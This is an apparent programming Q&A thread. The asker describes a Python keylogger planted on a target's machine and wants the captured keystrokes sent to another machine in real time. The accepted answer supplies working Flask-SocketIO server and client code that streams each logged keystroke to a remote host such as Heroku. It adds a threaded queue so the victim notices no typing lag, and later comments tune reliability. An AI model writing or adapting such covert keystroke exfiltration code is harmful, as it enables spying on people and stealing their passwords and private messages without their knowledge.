# Transfering log files wirelessly

Tags: python, file-transfer, wireless, keylogger

I'm a cyber security student working on a project which captures keystrokes and saves them to a .txt file (simple keylogger built with python) that'd be stored on a USB flash drive plugged in the target's machine. The key data must then be wirelessly transferred from the USB to another machine. I'm looking for the best way to transfer this data (preferably in real-time).
Any tips would be well appreciated.
Thanks in advance.

Comment: If you can run a syslog server on the machine that receives the data, you could log messages directly using python's logging module and skip the flash drive.

Answer (score 1, accepted):

You could do this using sockets. The below code uses a python server and client. The server can be hosted on Heroku or any other web hosting service that supports python servers. If you're deploying it to a hosting service, look at their documentation. You can also just run the server locally (for testing/demonstration purposes only).

Server:

```py
from flask import Flask, render_template
from flask_socketio import SocketIO, emit

app = Flask(__name__)
app.config['SECRET_KEY'] = 'secret!'
socketio = SocketIO(app)

@socketio.on('keylogger')
def test_connect(data):
    print(data["keylogged"])

if __name__ == '__main__':
    socketio.run(app)
```

Client Code (add this to your keylogger to send each keystoke):

```py
from socketIO_client import SocketIO, LoggingNamespace

socketIO = SocketIO('localhost', 5000, LoggingNamespace) # Change 5000 to 443 if running on heroku, and change the localhost to the server url
socketIO.emit('keylogger', {"keylogged": "<key that code logged>"})
```

If the above code client code is too slow, you may want to use `queue` and `threading` as show below:

```py
import queue
import threading
from socketIO_client import SocketIO, LoggingNamespace

socketIO = SocketIO('localhost', 5000, LoggingNamespace)


q = queue.Queue()

def background():
    while True:
        msg = q.get()
        socketIO.emit("keylogger", {"keylogged": msg})

sockthread = threading.Thread(target=background)
sockthread.start()


<code that logs key, and when a key is detected, adds the key into the queue: `q.put(key)`>
```

Before you run the below code, the server has these dependencies installed with pip:

```
flask
flask-socketio
```

and the client has these dependencies installed with pip:

```
socketIO-client
```

Comment: this is just a basic idea, the code may need to be tweeked

Comment: please click the check mark if this helped

Comment: Thank you for the detailed example. Will try it and give feedback afterwards.

Comment: I tried implementing this example seemingly successfully. However, the program becomes very slow. It takes ~2 seconds of processing time to detect, log and then send the keystroke to the server. Therefore, it's unable to detect every keystroke and typing anything on the target's machine also becomes very slow while the client is running. Do you perhaps have any idea on what could be causing this?

Comment: Every time the user pressed a key, you are running this code: `socketIO.emit('keylogger', {"keylogged": "<key that code logged>"})`, right? If you are, and it is still too slow, then you could sent the keystroke in another thread. I am adding an example now

Comment: Thank you very much, this did fix the problem on the client side. However, it still takes a good while to receive each keystroke on the server. I believe that wouldnt be a big issue, but does that mean that, for example, if the client side gets disconnected and the server hasn't received all of the queued keystrokes, they won't be fully transmitted? Nevertheless, I'm grateful for your help!

Comment: You'd have to test when the client is disconnected. Happy to help!